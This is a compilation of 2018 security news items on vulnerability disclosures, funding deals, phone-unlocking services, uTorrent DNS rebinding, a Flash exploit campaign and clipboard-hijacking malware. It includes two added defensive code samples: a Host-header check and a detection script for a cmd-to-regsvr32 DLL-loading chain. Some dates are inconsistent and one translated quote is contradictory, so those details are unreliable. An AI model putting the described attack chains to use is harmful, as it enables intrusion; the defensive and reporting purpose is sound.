Different affected SSOs will have different specific recommendations, and it would be best to refer to them for guidance. Similarly, there are different recommendations for maintainers of identity or service providers, maintainers of SAML processing libraries, and maintainers of XML parsing libraries. One thing that would help, suggest the authors, is the ability to enforce multi-factor authentication, "because this vulnerability would only allow a bypass of a user’s first factor of authentication." But the authors also warn, "if your IdP is responsible for both first factor and second factor authentication, it’s likely that this vulnerability bypasses both!"

Because multiple vendors are affected by this vulnerability, Duo Security worked with CERT/CC to co-ordinate disclosure. It provided the vulnerability information to CERT/CC on 18 December 2017. By 20 February 2018, all notified affected vendors had confirmed they were ready for disclosure; and Duo Security has disclosed the vulnerability details today.

Ann Arbor, Michigan-based Duo Security, a cloud-based provider of identity and access management solutions, announced a $70 million Series D funding round led by Meritech Capital Partners and Lead Edge Capital in October 2017. This brought the total amount raised to $119 million, and valued the company at $1.17 billion.

Industrial Cybersecurity Firm CyberX Raises $18 Million
27.7.2018 securityweek IT

Industrial cybersecurity startup CyberX announced today that it has raised $18 million in a Series B funding round, bringing the total amount received to date by the company to $30 million.

The latest funding round was led by Norwest Venture Partners, which also invested in FireEye and Symantec-acquired Fireglass, with participation from previous investors Glilot Capital Partners, Flint Capital, ff Venture Capital, and OurCrowd.

CyberX says it plans on using the additional funding to continue its expansion in Europe and the United States, drive international growth, and expand its product development, research, and threat intelligence teams.

Founded in 2013 by military cyber experts Nir Giller and Omer Schneider, CyberX offers a platform that continuously monitors networks and collects data to help detect potentially malicious activity. The company also recently unveiled simulation technology designed to help predict breach and attack vectors.

CyberX says its product has been used by Global 2000 organizations across the energy and utilities, chemical, oil and gas, manufacturing, and other critical infrastructure sectors.

“There is a growing need in many enterprises to connect their IIoT and ICS networks to corporate IT networks for performance, monitoring, and manageability reasons. This trend creates a new security risk which requires a modern, IIoT-optimized, security solution.” said Dror Nahumi, general partner at Norwest Venture Partners. “We are extremely impressed with CyberX’s solution and its successful adoption with top-tier enterprise customers across multiple verticals.”

“We’re proud that our team has delivered a series of industry-firsts, including the first anomaly detection platform to incorporate ICS-specific threat intelligence, risk and vulnerability assessments, and automated threat modeling, as well as native integration with SOC tools,” said Giller. “By providing SOC teams with deeper visibility into Operational Technology (OT) assets, behaviors, and threats, we’re helping organizations implement a unified approach across IT and OT security and remove silos between IT and OT -- thereby improving their combined IT/OT risk posture.”

CyberX previously raised $20,000 in 2013, $2 million in 2014, and another $9 million in 2016, which, along with some add-on investments to the Series A round brought the total raised so far to $30 million. The company noted that its latest funding is the largest B round to date in industrial cybersecurity.

Facebook Flaw Exposed Page Administrators
27.7.2018 securityweek

Facebook recently patched an information disclosure vulnerability that exposed page administrators, researcher Mohamed Baset reported this week.

Baset claimed he discovered the issue, which he described as a “logical error,” within a few minutes of receiving an invitation to like a Facebook page on which he had liked a post.

Looking at the email’s source code, the researcher noticed that it included the name of the page’s administrator and other details.

Facebook emails expose information on page admins

After being notified through its bug bounty program, Facebook acknowledged the vulnerability and decided to award the expert $2,500 for his findings.

Sophos’ Paul Ducklin has provided an explanation on why such an information disclosure flaw can pose a problem to Facebook page administrators.

“For many individual Facebook pages, the administrator and the page will share an identity, so putting the admin’s name in the page’s email isn’t really giving away much,” Ducklin said. “But for business or community pages, which might have a number of co-administrators, you wouldn’t expect Facebook to reveal anything more than the name of the page itself, at least not without asking.”

“If nothing else, this protects individual employees from getting bombarded with comments and questions – whether they’re praises or rants – in place of the account itself,” the expert added.

Baset, founder and lead penetration tester at Seekurity, said this was the second time he reported a vulnerability to Facebook without having to write any code to demonstrate his findings.

Facebook reported recently that last year it paid out more than $880,000 for 400 valid vulnerability reports submitted by white hat hackers.

Splunk to Acquire Security Orchestration Firm Phantom for $350 Million
27.7.2018 securityweek IT

Machine data solutions firm Splunk said on Tuesday that it has agreed to acquire Phantom Cyber, a provider of Security Orchestration, Automation and Response (SOAR) solutions.

Under the terms of the agreement, Splunk will pay approximately $350 million in cash and stock to acquire Palo Alto, Calif.-based Phantom.

Phantom, which has raised more than $23 million in funding, has developed a community-powered security automation and orchestration platform that currently has more than 200 “apps” which integrate with various security products. These apps are available for a wide range of security tools from partners including Cisco, McAfee, Palo Alto Networks, RSA Security, Symantec, Splunk, HPE, IBM and others.

By combining technologies from both companies, Splunk says that IT teams will be able to leverage automation capabilities to “help solve automation challenges in a widening range of use cases, including Artificial Intelligence for IT Operations (AIOps).”

Following the acquisition, Phantom founder and CEO Oliver Friedrichs will report to Haiyan Song, senior vice president and general manager of security markets at Splunk.

The acquisition is expected to close during the first half of 2018, subject to customary closing conditions and regulatory reviews.

“The majority of purchase price consideration will be paid from cash on our balance sheet. Total equity consideration plus Phantom employee retention incentives will result in less than one percent total dilution from this transaction,” said Dave Conte, chief financial officer, Splunk.

Investors in Phantom include the iconic Silicon Valley VC firm Kleiner Perkins, TechOperators Venture Capital, Blackstone, Foundation Capital, In-Q-Tel, Rein Capital, Zach Nelson, and John W. Thompson.

Changes in Apple’s iCloud Security Policies and Argument of China
27.7.2018 securityaffairs BigBrothers

Changes in Apple’s iCloud Security Policies – Apple has announced that it is relocating the encryption keys for its Chinese users’ iCloud data from the United States to China.
The latest controversy in the digital world surrounding Apple hit like a bullet when the iPhone maker announced that it would move the encryption keys for Chinese users’ data from the United States to China.

Some security advocates argue that this is a mistake for the company itself as well as a privacy threat for users, but according to Apple the keys are secure.
According to the reports, iCloud users in China are confused about how Apple will manage the confidentiality of their sensitive data.

Apple is also aware that data protection advocates have concerns about the change in privacy for iCloud users in China, according to two reports this week.
Sensitive data such as emails, photographs and messages are protected from hackers by encryption, and Apple will now store the encryption keys in China instead of the United States, Reuters and the Wall Street Journal report.

This means that the Chinese authorities no longer need to go through US legal channels to force Apple to provide access to the data. The step is a reaction to newly introduced laws in China, according to which iCloud services offered to Chinese citizens must keep their data within the country and can be operated by Chinese organizations.

By the end of the coming month, Apple is going to start moving the encrypted data to China and will work closely with the Chinese government. Apple did not say when the encryption keys themselves would move abroad.

Data protection advocates said, “The change can cause problems for political and other dissidents.”
“Given that Apple is going to work in China, it is unlikely that the government can get access to Apple’s data from the local community,” said a professor at the University of Toronto who closely studies the actions of the Chinese government.

Apple says, however, that the keys are stored in a secure place and that Apple will still control them. Apple also claimed that it would provide data only on demand, in line with China’s current legislative requirements, and that it has created no loopholes for access.
A senior Apple official told the news agencies that iCloud falls under the recently introduced laws.

The spokeswoman also noted that had Apple decided to discontinue the iCloud service in China, this would have reduced customers’ interaction with Apple and reduced the security and confidentiality of data for Chinese users.
Big multinationals such as Microsoft and Amazon also work with Chinese companies to provide cloud storage services and tap the vast Chinese market. Both US technology giants declined to tell the newspaper where the encryption keys for their customers’ data are stored.
Apple told the news agencies that it sent Chinese iCloud users a notice about the transition, which allows them to disable iCloud to avoid having their data stored in the country. Apple also said that nobody’s data will be moved before they accept the new terms of use in China.
Users whose settings indicate another region, such as Macao or Hong Kong, do not have their data stored on servers in China.

Reuters also includes Taiwan in this list; the Journal does not.
Apple and Amazon have not yet responded to our request for additional comment; Microsoft also declined to comment further.

Israeli mobile forensics firm Cellebrite can unlock every iPhone device on the market
27.7.2018 securityaffairs Apple

The Israeli mobile forensics firm Cellebrite has designed a technology that allows it to unlock almost any iPhone, including the latest iPhone X.
We have debated for a long time the legal dispute between Apple and the FBI for unlocking the San Bernardino shooter’s iPhone 5c.

The tech giant refused to help the US authorities unlock the mobile device, and the FBI paid over a million dollars to a third-party company to access the data on the San Bernardino shooter’s iPhone.

cellebrite ufed-touch

Such a dispute may not happen again in the future: the Israeli mobile forensics firm Cellebrite has designed a technology that allows it to unlock almost any iPhone, including the latest iPhone X.

Cellebrite is one of the world’s leading companies in the field of digital forensics, and it already works with major law enforcement and intelligence agencies worldwide.

Cellebrite provides the FBI with decryption technology as part of a contract signed in 2013, its technology allows investigators to extract information from mobile devices.

The company’s Advanced Unlocking and Extraction Services could be used to unlock every iPhone running iOS 11 and older versions.

“Cellebrite, a Petah Tikva, Israel-based vendor that’s become the U.S. government’s company of choice when it comes to unlocking mobile devices, is this month telling customers its engineers currently have the ability to get around the security of devices running iOS 11.” reads a post published by Forbes.

“That includes the iPhone X, a model that Forbes has learned was successfully raided for data by the Department for Homeland Security back in November 2017, most likely with Cellebrite technology.”

Cellebrite says its advanced services can break into “Apple iOS devices and operating systems, including iPhone, iPad, iPad mini, iPad Pro and iPod touch, running iOS 5 to iOS 11.”

According to Forbes, anonymous sources confirmed that Cellebrite could also unlock the iPhone 8, and likely the iPhone X.

“a source in the police forensics community told Forbes he’d been told by Cellebrite it could unlock the iPhone 8. He believed the same was most probably true for the iPhone X, as security across both of Apple’s newest devices worked in much the same way.” continues Forbes.

Law enforcement agencies that need to unlock a device (iOS or Android) simply send it to the company’s labs, where a pool of experts does the job; the service costs as little as $1,500 per unlock.

“In its labs, the company then uses whatever secret exploits it has to crack the lock and either hands it back to investigators so they can take data from the device, or Cellebrite can do that for them. As Forbes previously detailed, this can be relatively inexpensive, costing as little as $1,500 per unlock.” states Forbes.

It also appears that US authorities have already tried the Cellebrite service on the latest Apple device, the iPhone X. According to a warrant viewed by Forbes, related to a suspect in an arms trafficking case (Abdulmajid Saidi), his iPhone X was sent to a Cellebrite specialist at the DHS Homeland Security Investigations lab in Grand Rapids, and the data was extracted on December 5.

Cellebrite hasn’t commented on the latest report.

Flaw in Popular μTorrent Software Lets Hackers Control Your PC Remotely
27.2.2018 thehackernews

If you have installed world's most popular torrent download software, μTorrent, then you should download its latest version for Windows as soon as possible.
A security researcher at Google's Project Zero discovered a serious remote code execution vulnerability in both the 'μTorrent desktop app for Windows' and the newly launched 'μTorrent Web', which lets users download and stream torrents directly in their web browser.
μTorrent Classic and μTorrent Web run in the background on the Windows machine and start a locally hosted HTTP RPC server on ports 10000 and 19575, respectively, through which users can reach their interfaces from any web browser.
However, Project Zero researcher Tavis Ormandy found that several issues with these RPC servers could allow remote attackers to take control of the torrent download software with little user interaction.
According to Ormandy, the uTorrent apps are vulnerable to a technique called DNS rebinding, which could allow any malicious website a user visits to execute code on the user's computer remotely.

To mount a DNS rebinding attack, an attacker sets up a malicious website whose DNS name, after the page has loaded, is switched to resolve to the local IP address of the computer running a vulnerable uTorrent app; the browser then treats the page's requests to the local RPC server as same-origin, because the hostname has not changed.
"This requires some simple DNS rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable," Ormandy explained.
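The standard defence for a localhost RPC server against DNS rebinding is to check that the Host header actually names the loopback service: the browser fills Host from the URL it navigated to, so a rebinding page served from attacker.example still sends `Host: attacker.example:10000` even though the TCP connection lands on 127.0.0.1. The following is an added example of that check, not BitTorrent's patch and not uTorrent code; the RebindSafeRpcHandler class, the choice of port 10000 and the JSON body are assumptions made for the demonstration.

```python
import http.server
import json

# Names a legitimate local client would put in the Host header.
LOOPBACK_NAMES = {"localhost", "127.0.0.1", "[::1]"}


def split_host_port(host_header: str):
    """Split a Host header into (name, port); (None, None) if malformed.
    A bracketed IPv6 literal keeps its brackets so it is compared whole."""
    h = host_header.strip().lower()
    if h.startswith("["):
        end = h.find("]")
        if end < 0:
            return None, None
        name, rest = h[: end + 1], h[end + 1 :]
    else:
        name, sep, port_part = h.partition(":")
        rest = sep + port_part
    if rest == "":
        return name, None
    if not (rest.startswith(":") and rest[1:].isdigit()):
        return None, None
    return name, int(rest[1:])


def host_header_allowed(host_header, expected_port: int) -> bool:
    """True only if Host names this loopback service on its real port.
    A rebinding page's requests carry the attacker's hostname here, so
    they are refused even though the socket peer is 127.0.0.1."""
    if not host_header:
        return False
    name, port = split_host_port(host_header)
    if name is None or name not in LOOPBACK_NAMES:
        return False
    if port is None:
        port = 80  # Host without a port means the default HTTP port, never 10000
    return port == expected_port


class RebindSafeRpcHandler(http.server.BaseHTTPRequestHandler):
    """Minimal stand-in for a local RPC endpoint (assumed, not uTorrent's).
    The Host check runs before anything is served, including whatever
    secret or token the real RPC would hand out on its token endpoint."""

    def do_GET(self):
        if not host_header_allowed(self.headers.get("Host"), self.server.server_port):
            self.send_error(403, "Host header does not name this service")
            return
        body = json.dumps({"status": "ok", "path": self.path}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Bind to loopback only; the Host check guards against rebinding on top.
    http.server.HTTPServer(("127.0.0.1", 10000), RebindSafeRpcHandler).serve_forever()
```

Binding to 127.0.0.1 alone does not stop rebinding, because the victim's own browser is the client; the Host check is what breaks the attack. For endpoints called from scripts, checking the Origin header the same way adds a second barrier.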
Proof-of-Concept Exploits for uTorrent Software Released Publicly

Ormandy also provided proof-of-concept exploits for μTorrent Web and μTorrent desktop (1 and 2), which are capable of passing malicious commands through the domain in order to get them to execute on the targeted computer.
Last month, Ormandy demonstrated same attack technique against the Transmission BitTorrent app.
Ormandy reported the issues in the uTorrent client to BitTorrent in November 2017 under a 90-day disclosure deadline, but a patch was only made public on Tuesday, almost 80 days after the initial report.
What's more, the company re-issued new security patches the same day after Ormandy found that, with a small tweak, his exploits continued to work in the default configuration.
"This issue is still exploitable," Ormandy said. "The vulnerability is now public because a patch is available, and BitTorrent have already exhausted their 90 days anyway."
"I see no other option for affected users but to stop using uTorrent Web and contact BitTorrent and request a comprehensive patch."
Patch your uTorrent Software NOW!
The company assured its users that all the vulnerabilities Ormandy reported in two of its products had been addressed with the release of:
μTorrent Stable
BitTorrent Stable
μTorrent Beta
μTorrent Web
All users are urged to update their software immediately.

Phone-Cracking Firm Found a Way to Unlock Any iPhone Model
27.2.2018 thehackernews Apple

Remember the infamous encryption fight between Apple and the FBI for unlocking an iPhone belonging to a terrorist behind the San Bernardino mass shooting that took place two years ago?
After Apple refused to help the feds access data on the locked iPhone, the FBI eventually paid over a million dollars to a third-party company to unlock the shooter's iPhone 5c.
Now, it appears that the federal agency will not have to fight Apple over unlocking iPhones since the Israeli mobile forensics firm Cellebrite has reportedly figured out a way to unlock almost any iPhone in the market, including the latest iPhone X.
Cellebrite, a major security contractor to the United States law enforcement agencies, claims to have a new hacking tool for unlocking pretty much every iPhone running iOS 11 and older versions, Forbes reports.
In its own literature [PDF] "Advanced Unlocking and Extraction Services," Cellebrite says its services can break the security of "Apple iOS devices and operating systems, including iPhone, iPad, iPad mini, iPad Pro and iPod touch, running iOS 5 to iOS 11."
Citing anonymous sources, the publication reported that Cellebrite could also unlock the iPhone 8, and since the security across Apple's newest iPhone devices worked in much the same way, the company can break the security of the iPhone X as well.
Besides Apple's devices, Cellebrite can also break into Google Android-powered smartphones from Samsung (Galaxy and Note series), Alcatel, Google Nexus, HTC, Huawei, LG, Motorola, ZTE and many more.
"Cellebrite Advanced Unlocking Services is the industry's only solution for overcoming many types of complex locks on market-leading devices," Cellebrite literature explains.
"This can determine or disable the PIN, pattern, password screen locks or passcodes on the latest Apple iOS and Google Android devices."
Last November, the Department of Homeland Security reportedly managed to get into an iPhone X owned by a suspect in an arms trafficking case, probably with the help of a Cellebrite-trained specialist.
However, a warrant discovered by Forbes does not mention the method or technology used by law enforcement to hack into the iPhone X.
Founded in 1999, Cellebrite provides digital forensics tools and software for mobile phones to its customers, which also includes the US government.
One of its main products is the Universal Forensic Extraction Device (UFED) that claims to help investigators extract all data and passwords from mobile phones.
While Cellebrite's iPhone hacking tool has the potential to affect hundreds of millions of Apple users, Apple also rolls out software updates and patches on a regular basis.
Users are therefore advised to keep their devices up to date, as it is hard to say whether the company's techniques work on the latest iOS 11 updates.
Neither Cellebrite nor Apple immediately commented on the latest report.

Android P Will Block Background Apps from Accessing Your Camera, Microphone
27.2.2018 thehackernews Android

Yes, your smartphone is spying on you. But, the real question is, should you care?
We have published thousands of articles on The Hacker News, warning how any mobile app can turn your smartphone into a bugging device—'Facebook is listening to your conversations', 'Stealing Passwords Using SmartPhone Sensors', 'Your Headphones Can Spy On You' and 'Android Malware Found Spying Military Personnel' to name a few.
All these stories have different objectives and targets but have one thing in common, i.e., apps running in the background covertly abuse ‘permissions’ without notifying users.
Unknowingly installing a single malicious app could allow remote attackers to covertly record audio and video and take photos in the background.
But, not anymore!
In a boost to user privacy, the next version of Google's mobile operating system, Android P, will apparently block apps idling in the background from accessing your smartphone's camera and microphone.
According to the Android Open Source Project (AOSP) commit, Google is working on two built-in features in Android P to protect its users from malicious apps spying on them using smartphones’ camera or microphone.
First spotted by XDA Developers, the source code commits for both the camera and microphone changes note that apps that are "idle" (i.e., running in the background) "for more than a certain amount of time" without declaring themselves will not be able to use the microphone or camera.
To do so, Android P targets an app's User ID (UID), a unique ID assigned to an app when it is installed on an Android device; it cannot be altered and is permanent until the app is uninstalled.
Android P keeps an eye on the app's UID and blocks it from accessing the camera in any way whenever that UID is idle; repeated attempts to request access to the camera generate errors.
Microphone-using apps, however, will not be cut off from the microphone outright, but will "report empty data (all zeros in the byte array), and once the process goes in an active state, we report the real mic data."
It should also be noted that users talking on the phone while using other apps need not worry about these new features, because the dialer application remains active even after it goes into the background.
Imposing such limitations on apps would surely alleviate spying fears for Android users today, when advertisers have been reported to misuse such features to listen in on app users, and Android malware capable of capturing audio, video and images in the background, such as Skygofree and Lipizzan, is already out there.
Android P is still in development and does not yet have a name. The company is expected to present the next major version of Android at this year's Google I/O developer conference, which will take place from May 8 to May 10 at the Shoreline Amphitheatre in Mountain View, California.

North Korea's Flash Player Flaw Now Exploited by Cybercriminals
27.2.2018 securityweek BigBrothers

Endpoint security firm Morphisec has spotted a massive campaign that exploits a recently patched Adobe Flash Player vulnerability to deliver malware.

The flaw in question, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean hackers had been exploiting the vulnerability in attacks aimed at South Korea. The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns.

After Adobe patched the security hole, which allows remote code execution, other malicious actors started looking into ways to exploit CVE-2018-4878.

Morphisec said it spotted a campaign on February 22, which had been using a version of the exploit similar to the one developed by APT37. However, researchers pointed out that the exploit in the malspam campaign, unlike the one used in the original attacks, did not have a 64-bit version.

The attack starts with a spam email containing a link to a document stored on safe-storage[.]biz. Once downloaded and opened, the document informs users that an online preview is not available and instructs them to enable editing mode in order to view the content.

If users comply, the Flash vulnerability is exploited and the Windows command prompt is executed. The associated cmd.exe file is then injected with malicious shellcode that connects to the attacker’s domain.

A DLL file is then downloaded by the shellcode and executed using the Microsoft Register Server (regsvr32) utility. The legitimate tool is abused in an effort to bypass whitelisting products.
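As an added illustration of how a defender might flag the chain described above (document viewer, then cmd.exe, then regsvr32 loading a downloaded DLL), and not part of Morphisec's analysis: the rules below run over a few constructed process-creation events. The event field names, the list of document applications and the trusted-directory prefixes are assumptions.

```python
import re
from typing import Dict, List, Optional

# Matches the DLL argument of a regsvr32 command line, quoted or not.
DLL_ARG = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.IGNORECASE)

# Directories a standard user cannot write to (assumed baseline; extend per environment).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Processes that render user-supplied documents; a shell spawned by one of them is unusual.
DOCUMENT_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe")

# Constructed sample events (not real telemetry); the field names are an assumption
# modelled loosely on Sysmon/EDR process-creation records.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4100", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},  # installer, benign
    {"pid": "5001", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "cmd.exe"},                                                # shell from a document
    {"pid": "5232", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\x.dll"},  # dropped DLL
    {"pid": "6010", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe"},                                                # user shell, benign
]


def dll_path_from_cmdline(cmdline: str) -> Optional[str]:
    """Extract the DLL path passed to regsvr32, or None if there is none."""
    m = DLL_ARG.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def is_user_writable(path: str) -> bool:
    """True unless the path sits under a directory a standard user cannot write to."""
    return not path.lower().startswith(TRUSTED_PREFIXES)


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons this event looks like the described attack chain."""
    reasons: List[str] = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    if image == "regsvr32.exe":
        dll = dll_path_from_cmdline(event["cmdline"])
        if dll is not None and is_user_writable(dll):
            reasons.append(f"regsvr32 loading a DLL from a user-writable path: {dll}")
        if parent == "cmd.exe":
            reasons.append("regsvr32 spawned by cmd.exe")
    if image == "cmd.exe" and parent in DOCUMENT_APPS:
        reasons.append(f"command prompt spawned by document application {parent}")
    return reasons


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map pid -> reasons for every event that triggered at least one rule."""
    return {e["pid"]: r for e in events if (r := evaluate(e))}


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```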

The malicious documents and the Flash exploit were only detected by a few security solutions based on their signature at the time of Morphisec’s analysis.

Since the URLs included in the spam emails were created using Google’s URL shortening service, researchers determined that each of the different links delivered in this campaign had been clicked tens and even hundreds of times within 3-4 days of being created. Users clicked on the links from various browsers and email services, including Outlook, Gmail and Aruba.it.

“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible,” Morphisec’s Michael Gorelik explained in a blog post. “With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.”

Evrial: The Latest Malware That Steals Bitcoins Using the Clipboard
27.2.2018 securityaffairs

Evrial is a cryptocoin malware stealer discovered by the researchers at ElevenPaths which takes control of the clipboard to get “easy money”.

ElevenPaths has taken a deep technical dive into the malware itself, to show how it technically works, with a quite self-explanatory video. Aside from that, we have followed the steps of its Russian creator and found that his scam has been targeting other scammers themselves.


By the end of 2017, CryptoShuffle was a malware sample capable of reading the clipboard and modifying cryptocurrency addresses found there. Later, someone realized that there could be some business in providing these features as a service and started to sell the platform itself, calling it “Evrial”. The product consisted of a .NET malware sample capable of stealing passwords from browsers, FTP clients and Pidgin; it could also modify the clipboard on the fly so as to change any copied cryptocurrency address to whatever address the attacker wanted.

Evrial allows the attacker to control it all from a comfortable panel where the stolen data can be easily explored. When the attacker buys the application, he can set his “name” for logging into the panel which will be hardcoded in the code, so that the shipped Evrial version is unique for him.

When you want to make a Bitcoin transfer, you usually copy and paste the destination address. In this sense, the attacker waits until the user, trusting in the clipboard action, sends a new transaction to the copied cryptocurrency address, without knowing that the recipient’s address has been silently modified to one that belongs to the attacker. The malware performs this task in the background for different types of address including Bitcoin, Litecoin, Ethereum and Monero addresses as well as for Steam identifiers and Webmoney WMR and WMZ units.

The author exposes his username in Telegram: @Qutrachka. The account is in the source code so that he can be contacted. Using this information and some other analysed samples, it has been possible to identify users in different deep web forums under the name Qutra whose main objective is to sell this malicious software. There is also evidence that the CryptoShuffle malware was linked to the same threat actor, after identifying a publication in Pastebin explaining the functionalities of this family, published under the same user.

We are able to guess how much is in every wallet. He has received a total of 21 transactions into the Bitcoin wallet, supposedly from his victims, collecting approximately 0.122 BTC. While ransomware wallets usually receive the same amount from their victims, here the range is wider because the legitimate payments that the victims wanted to make are, of course, of different amounts.

The attacker has moved all the money to several addresses to try to blur the trail of his payments. The attacker has received 0.0131 Litecoins as well, but this amount is still available in his wallet. On the other hand, it has not been possible to track any payments related to his Monero account because of how this technology works so as to hide the information of which parties have been involved in each operation. At the same time, we could not find out any additional information linked to his various Webmoney accounts (WMR and WMZ). Anyway, what is clear is that this type of malicious behavior is technically viable while it is being used in the wild.

Line Between Nation-State, Criminal Hackers Increasingly Blurred: Report
26.2.2018 securityweek Crime

The line between the level of sophistication typically exhibited by state-sponsored threat groups and cybercriminals became increasingly blurred in the past year, according to CrowdStrike’s 2018 Global Threat Report.

CrowdStrike has analyzed various aspects of the cybersecurity landscape in the past year, including targeted attacks launched by nation state actors, the tools and operations of cybercriminals, hacktivism, law enforcement campaigns, and the effectiveness of attacks and defense mechanisms.

According to the security firm, there are several factors that led to the leveling of the playing field, but one of the most significant is the so-called “trickle-down effect.” This product adoption model states that a product initially too expensive for the masses eventually gets cheap enough for the general public to acquire.

Applying this model to the cybersecurity scene, we have the EternalBlue exploit, which is believed to have been developed by the U.S. National Security Agency (NSA), getting leaked by a group named Shadow Brokers. This has allowed other state-sponsored attackers – including in the WannaCry and NotPetya attacks believed to have been launched by North Korea and Russia – and profit-driven cybercriminals to use the exploit to accomplish their own goals.

On one hand, attacks such as the ones involving NotPetya and WannaCry malware have inspired cybercriminals, giving them ideas on how to maximize profits. On the other hand, state-sponsored actors have also taken inspiration from cybercriminals – both the NotPetya and WannaCry attacks were made to appear as if they were ransomware campaigns launched by profit-driven criminals.

Sophisticated supply chain attacks have been typically used by nation state groups, but last year saw several incidents that did not appear to be the work of state-sponsored cyberspies.

One incident involved rogue Python libraries being uploaded to the Python Package Index (PyPI). While the libraries included malicious code, it actually turned out to be benign, which has led some experts to believe that it may have been the work of a grey hat hacker.

Other incidents involved a piece of macOS malware called ProtonRAT, which attackers managed to deliver last year on at least two occasions after compromising websites hosting popular video conversion and media player apps. Operation WilySupply analyzed by Microsoft also falls into this category.

The list of supply chain attacks attributed to state-sponsored groups last year included the CCleaner and NetSarang incidents, which some linked to China, and the NotPetya campaign, whose initial infection vector was an updater for a Ukrainian tax accounting application.

“CrowdStrike's report is just one more in a long line of publications that demonstrates the increasing futility of technical attribution. The largest detriment of this trend of nation states hiding in the hacking noise is that the security industry no longer can have confidence in its traditional technical attribution models. Relying on code usage and IPs in a world where we know tool kits and techniques are shared, stolen, and sold amongst hackers is a recipe for misattribution,” Ross Rustici, senior director of intelligence services at Cybereason, commented on the CrowdStrike report.

“Hackers, especially the higher tier, have proven time and again that they are capable and willing to play on cybersecurity's habit of confirmation bias by using false flags to point the community in the direction of a particular nation state or criminal group that is either: 1) currently the most talked about group, which plays into the self interest of the company of finding something that already garners a lot of media and PR attention; or 2) plays to the nationalism of the victim,” Rustici added.

NanoCore RAT Creator Sentenced to Prison
26.2.2018 securityweek

A Hot Springs, Arkansas man who last year admitted in court to creating the NanoCore RAT (Remote Access Trojan) was sentenced to 33 months in prison.

Taylor Huddleston, 27, was sentenced on Friday for helping and assisting with computer intrusions through the development and marketing of malicious software, the Department of Justice announced. The programs he created were used to steal sensitive data from victims, spy on them, and conduct other illegal intrusions.

In addition to the 33 months in prison, Huddleston was ordered to serve two years of supervised release following his prison sentence.

Accused of developing, marketing, and distributing two malware families, Huddleston pleaded guilty in court in July 2017.

The first malicious program Huddleston developed is the NanoCore RAT, a backdoor that allows attackers to steal information from victim computers, including passwords, emails, instant messages, and other sensitive data. Used to infect and attempt to infect tens of thousands of systems, the RAT allows attackers to activate infected machines’ webcams to spy on victims.

NanoCore RAT was used in attacks targeting the finance departments of small and medium-sized businesses in the U.K., the U.S. and India, as well as in other global infection campaigns. Distribution methods ranged from fileless tricks to the abuse of the free Voice-over-IP (VoIP) service Discord, among others.

Huddleston also admitted to creating Net Seal, licensing software that allowed him to distribute malware for co-conspirators for a fee. Huddleston is said to have used Net Seal to assist Zachary Shames in his attempt to infect 3,000 systems with malware that was in turn used to infect 16,000 computers.

Huddleston built Net Seal in 2012 and created NanoCore in 2014 (he marketed the RAT as a remote desktop management utility).

In his guilty plea last year, Huddleston admitted that he intended the programs to be used maliciously.

PhishMe Acquired at $400 Million Valuation, Rebranded as Cofense
26.2.2018 securityweek

Private Equity Deal Values Cofense at $400 Million

PhishMe, a security awareness firm that focuses on training employees on how to recognize and report phishing attacks, has been acquired by a private equity consortium in a deal that valued the company at $400 Million.

The company has also re-branded and changed its name to Cofense.

“PhishMe was founded to challenge the cliché - human is the weakest link,” said Rohyt Belani, CEO and Co-Founder of Cofense. “The Cofense solution set leverages internal employee-generated attack intelligence in concert with purpose-built response technologies to break the attack kill chain at delivery. Cofense reflects the full breadth of our portfolio of enterprise-wide attack detection, response, and orchestration solutions.”

The company says it currently has more than 1,700 customers globally and that its PhishMe Reporter is installed on more than 10 million endpoints.

In a recent survey by the Financial Services Information Sharing and Analysis Center (FS-ISAC) that polled more than 100 of its 7,000 global members, thirty-five percent of CISOs in the financial sector consider staff training to be the top priority for cyber defense.

“With cybersecurity a top priority for organizations everywhere, our goal is to continue bringing innovative products to markets around the globe to help stop active attacks faster than ever,” Belani added.

Cofense says it has experienced roughly 80% CAGR over the last four years, and has new offices opening in Australia, Singapore, Dubai, and Saudi Arabia.

The company has previously raised a total of roughly $58 million, including a large $42.5 million funding round in July 2016. The company had raised $2.5 million in July 2012 in a Series A round, followed by $13 Million in a Series B funding round in March 2015.

Security awareness firms have been the subject of significant funding and M&A transactions in recent months.

Earlier this month, security awareness training firm Wombat Security agreed to be acquired by Proofpoint for $225 million in cash. In August 2017, Webroot acquired Securecast, an Oregon-based company that specializes in security awareness training. In October 2017, security awareness training and simulated phishing firm KnowBe4 secured $30 million in Series B financing, which brought the total amount raised by KnowBe4 to $44 million. Security awareness training firm PhishMe has raised nearly $58 million in funding, including a $42.5 million Series C funding round in July 2016.

Researchers Propose Improved Private Web Browsing System
26.2.2018 securityweek Privacy

A group of researchers from MIT and Harvard have presented a new system designed to make private browsing even more private.

